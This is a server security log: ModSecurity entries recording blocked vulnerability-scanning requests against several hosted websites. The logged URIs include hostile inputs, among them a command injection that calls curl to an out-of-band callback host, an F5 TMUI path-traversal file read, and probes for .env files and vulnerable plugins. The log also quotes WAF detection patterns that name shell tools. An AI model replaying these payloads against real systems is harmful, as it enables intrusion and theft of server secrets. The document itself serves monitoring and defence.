[Tue May 26 12:52:31.141518 2026] [security2:error] [pid 461618:tid 461848] [client 23.94.40.119:34254] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/kylin/api/user/authentication"] [unique_id "ahVKN1yiSlSCHr1fdr2ijgAAAOk"]
[Tue May 26 12:52:31.413361 2026] [security2:error] [pid 461618:tid 461789] [client 23.94.40.119:34264] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/kylin/api/cubes/kylin_streaming_cube/ 31`curl d8akjpc38ndbrs5c98fghg5o4jw3tq4mh.oast.fun`/migrate"] [unique_id "ahVKN1yiSlSCHr1fdr2ikwAAAK4"]
[Tue May 26 12:52:32.040191 2026] [security2:error] [pid 461618:tid 461806] [client 23.94.40.119:34290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/hms/user-login.php"] [unique_id "ahVKOFyiSlSCHr1fdr2ipgAAAL8"]
[Tue May 26 12:52:32.475216 2026] [security2:error] [pid 461618:tid 461859] [client 23.94.40.119:34292] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKOFyiSlSCHr1fdr2itgAAAPQ"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:52:32.481308 2026] [security2:error] [pid 461618:tid 461787] [client 23.94.40.119:34302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKOFyiSlSCHr1fdr2itwAAAKw"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:52:32.741370 2026] [security2:error] [pid 461618:tid 461852] [client 23.94.40.119:34308] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/import-xml-feed/readme.txt"] [unique_id "ahVKOFyiSlSCHr1fdr2iugAAAO0"]
[Tue May 26 12:52:32.958979 2026] [security2:error] [pid 461618:tid 461791] [client 23.94.40.119:34336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:download. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ahVKOFyiSlSCHr1fdr2ixAAAALA"]
[Tue May 26 12:52:33.127158 2026] [security2:error] [pid 461618:tid 461825] [client 23.94.40.119:34348] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVKOVyiSlSCHr1fdr2iyQAAANI"]
[Tue May 26 12:52:33.460692 2026] [security2:error] [pid 461618:tid 461815] [client 23.94.40.119:34354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/login.php"] [unique_id "ahVKOVyiSlSCHr1fdr2i2wAAAMg"]
[Tue May 26 12:52:33.547288 2026] [security2:error] [pid 461618:tid 461779] [client 23.94.40.119:34362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"] [unique_id "ahVKOVyiSlSCHr1fdr2i3gAAAKQ"]
[Tue May 26 12:52:33.587143 2026] [cgid:error] [pid 461618:tid 461872] [client 23.94.40.119:34376] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/execute_cmd.cgi: script not found or unable to stat
[Tue May 26 12:52:33.823914 2026] [security2:error] [pid 461618:tid 461757] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKOVyiSlSCHr1fdr2i0wAAAI4"]
[Tue May 26 12:52:34.135295 2026] [security2:error] [pid 461618:tid 461749] [client 23.94.40.119:34422] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ahVKOlyiSlSCHr1fdr2i7AAAAIY"]
[Tue May 26 12:52:34.393061 2026] [security2:error] [pid 461618:tid 461793] [client 23.94.40.119:34426] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ahVKOlyiSlSCHr1fdr2jFgAAALI"]
[Tue May 26 12:52:34.917653 2026] [security2:error] [pid 461618:tid 461666] [remote 172.236.172.195:50876] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.172.236.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVKOlyiSlSCHr1fdr2jGQAA4y8"]
[Tue May 26 12:52:35.604731 2026] [security2:error] [pid 461618:tid 461674] [remote 65.2.90.30:44296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVKO1yiSlSCHr1fdr2jNQAA8Dc"]
[Tue May 26 12:52:35.665181 2026] [security2:error] [pid 461618:tid 461849] [client 157.20.138.61:56324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKO1yiSlSCHr1fdr2jNwAAAOo"]
[Tue May 26 12:52:35.665319 2026] [security2:error] [pid 461618:tid 461849] [client 157.20.138.61:56324] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKO1yiSlSCHr1fdr2jNwAAAOo"]
[Tue May 26 12:52:36.009837 2026] [security2:error] [pid 461618:tid 461787] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKO1yiSlSCHr1fdr2jOgAAAKw"]
[Tue May 26 12:52:37.024689 2026] [security2:error] [pid 461618:tid 461867] [client 23.94.40.119:34444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKPVyiSlSCHr1fdr2jZQAAAPw"]
[Tue May 26 12:52:37.734730 2026] [security2:error] [pid 461618:tid 461829] [client 23.94.40.119:34460] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/login.htm"] [unique_id "ahVKPVyiSlSCHr1fdr2jgQAAANY"]
[Tue May 26 12:52:37.947450 2026] [security2:error] [pid 461618:tid 461858] [client 50.80.215.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKPVyiSlSCHr1fdr2jewAAAPM"]
[Tue May 26 12:52:38.220169 2026] [security2:error] [pid 461618:tid 461777] [client 62.244.225.226:41487] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVKPVyiSlSCHr1fdr2jiwAAAKI"]
[Tue May 26 12:52:38.281214 2026] [security2:error] [pid 461618:tid 461810] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKPVyiSlSCHr1fdr2jhgAAAMM"]
[Tue May 26 12:52:38.495414 2026] [security2:error] [pid 461618:tid 461751] [client 23.94.40.119:33496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKPlyiSlSCHr1fdr2jowAAAIg"]
[Tue May 26 12:52:39.007237 2026] [security2:error] [pid 461618:tid 461862] [client 144.48.82.14:49562] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVKPlyiSlSCHr1fdr2jmgAAAPc"]
[Tue May 26 12:52:39.226333 2026] [security2:error] [pid 461618:tid 461769] [client 23.94.40.119:33504] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/loginizer/readme.txt"] [unique_id "ahVKP1yiSlSCHr1fdr2jugAAAJo"]
[Tue May 26 12:52:39.436272 2026] [cgid:error] [pid 461618:tid 461756] [client 23.94.40.119:33516] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/setup.cgi: script not found or unable to stat
[Tue May 26 12:52:39.957424 2026] [security2:error] [pid 461618:tid 461820] [client 23.94.40.119:33526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/include/makecvs.php"] [unique_id "ahVKP1yiSlSCHr1fdr2jzwAAAM0"]
[Tue May 26 12:52:40.220205 2026] [security2:error] [pid 461618:tid 461793] [client 23.94.40.119:33536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tos/index.php"] [unique_id "ahVKQFyiSlSCHr1fdr2j2gAAALI"]
[Tue May 26 12:52:40.370278 2026] [security2:error] [pid 461618:tid 461799] [client 23.94.40.119:33568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/assets/php/upload.php"] [unique_id "ahVKQFyiSlSCHr1fdr2j4AAAALg"], referer: http://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:52:40.653651 2026] [security2:error] [pid 461618:tid 461842] [client 23.94.40.119:33588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/assets/data/usrimg/3efh8pg7hklde6dlgkrlj6m4hi1.php"] [unique_id "ahVKQFyiSlSCHr1fdr2j6wAAAOM"]
[Tue May 26 12:52:40.897982 2026] [security2:error] [pid 461618:tid 461871] [client 43.173.180.205:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVKQFyiSlSCHr1fdr2j4wAAAQA"]
[Tue May 26 12:52:41.013282 2026] [security2:error] [pid 461618:tid 461780] [client 144.48.82.78:31696] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVKQFyiSlSCHr1fdr2j2QAAAKU"]
[Tue May 26 12:52:41.176694 2026] [security2:error] [pid 461618:tid 461815] [client 23.94.40.119:33606] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/admin/ajax.php"] [unique_id "ahVKQVyiSlSCHr1fdr2j9wAAAMg"]
[Tue May 26 12:52:41.269935 2026] [security2:error] [pid 461618:tid 461816] [client 23.94.40.119:33614] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKQVyiSlSCHr1fdr2kAQAAAMk"]
[Tue May 26 12:52:41.458515 2026] [security2:error] [pid 461618:tid 461768] [client 23.94.40.119:33618] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:cd|perl|killall|traceroute|python|r(?:pm|sync)|yum|apt-get|emerge|lynx|links|mkdir|elinks|cmd|pwd|wget|lwp-(?:download|request|mirror|rget)|id|uname|cvs|svn|(?:s|r)(?:cp|sh)|n(?:et(?:stat|cat)|asm)|rexec|smbclient|t?ftp|ncftp|curl|telnet|g(?:c ..." at REQUEST_URI. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "582"] [id "340023"] [rev "6"] [msg "Atomicorp.com WAF Rules: Attack Blocked - remote command execution"] [data "cat /"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/kerbynet"] [unique_id "ahVKQVyiSlSCHr1fdr2kCAAAAJk"]
[Tue May 26 12:52:41.489000 2026] [security2:error] [pid 461618:tid 461868] [client 23.94.40.119:33644] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/admin/index.php"] [unique_id "ahVKQVyiSlSCHr1fdr2kCgAAAP0"]
[Tue May 26 12:52:41.593519 2026] [security2:error] [pid 461618:tid 461762] [client 23.94.40.119:33646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKQVyiSlSCHr1fdr2kCwAAAJM"]
[Tue May 26 12:52:41.684566 2026] [security2:error] [pid 461618:tid 461778] [client 23.94.40.119:33660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/incom/modules/uploader/showcase/script.php"] [unique_id "ahVKQVyiSlSCHr1fdr2kEgAAAKM"]
[Tue May 26 12:52:41.711386 2026] [security2:error] [pid 461618:tid 461756] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKQVyiSlSCHr1fdr2j_wAAAI0"]
[Tue May 26 12:52:41.949912 2026] [security2:error] [pid 461618:tid 461799] [client 23.94.40.119:33688] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/goform/setSysAdm"] [unique_id "ahVKQVyiSlSCHr1fdr2kHAAAALg"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in/login.shtml
[Tue May 26 12:52:41.977305 2026] [security2:error] [pid 461618:tid 461841] [client 23.94.40.119:33696] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/actions/authenticate.php"] [unique_id "ahVKQVyiSlSCHr1fdr2kHQAAAOI"]
[Tue May 26 12:52:42.479371 2026] [security2:error] [pid 461618:tid 461811] [client 23.94.40.119:33726] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/auth/requestreset"] [unique_id "ahVKQlyiSlSCHr1fdr2kLgAAAMQ"]
[Tue May 26 12:52:42.745978 2026] [security2:error] [pid 461618:tid 461770] [client 23.94.40.119:33758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/ebook/bookPerPub.php"] [unique_id "ahVKQlyiSlSCHr1fdr2kNgAAAJs"]
[Tue May 26 12:52:42.838285 2026] [security2:error] [pid 461618:tid 461752] [client 23.94.40.119:33790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-post.php"] [unique_id "ahVKQlyiSlSCHr1fdr2kPAAAAIk"]
[Tue May 26 12:52:42.957485 2026] [security2:error] [pid 461618:tid 461827] [client 45.142.80.245:36858] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVKQlyiSlSCHr1fdr2kHgAAANQ"]
[Tue May 26 12:52:43.026949 2026] [security2:error] [pid 461618:tid 461846] [client 23.94.40.119:33798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKQ1yiSlSCHr1fdr2kQQAAAOc"]
[Tue May 26 12:52:43.168408 2026] [security2:error] [pid 461618:tid 461858] [client 23.94.40.119:33822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php"] [unique_id "ahVKQ1yiSlSCHr1fdr2kSQAAAPM"]
[Tue May 26 12:52:43.447911 2026] [security2:error] [pid 461618:tid 461820] [client 23.94.40.119:33864] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/dfsms/"] [unique_id "ahVKQ1yiSlSCHr1fdr2kUAAAAM0"]
[Tue May 26 12:52:43.478763 2026] [security2:error] [pid 461618:tid 461833] [client 23.94.40.119:33874] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi"] [unique_id "ahVKQ1yiSlSCHr1fdr2kUQAAANo"]
[Tue May 26 12:52:43.788571 2026] [security2:error] [pid 461618:tid 461867] [client 23.94.40.119:33888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ahVKQ1yiSlSCHr1fdr2kXwAAAPw"]
[Tue May 26 12:52:43.829887 2026] [security2:error] [pid 461618:tid 461823] [client 23.94.40.119:33904] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:fileName. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ahVKQ1yiSlSCHr1fdr2kYAAAANA"]
[Tue May 26 12:52:43.906105 2026] [security2:error] [pid 461618:tid 461755] [client 23.94.40.119:33914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php/catalogsearch/advanced/result/"] [unique_id "ahVKQ1yiSlSCHr1fdr2kYQAAAIw"]
[Tue May 26 12:52:44.744541 2026] [security2:error] [pid 461618:tid 461845] [client 23.94.40.119:33938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/account/index.php"] [unique_id "ahVKRFyiSlSCHr1fdr2kfgAAAOY"]
[Tue May 26 12:52:44.748272 2026] [security2:error] [pid 461618:tid 461766] [client 176.65.139.235:55530] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.ans.onesoft.in"] [uri "/.env"] [unique_id "ahVKRFyiSlSCHr1fdr2kfwAAAJc"]
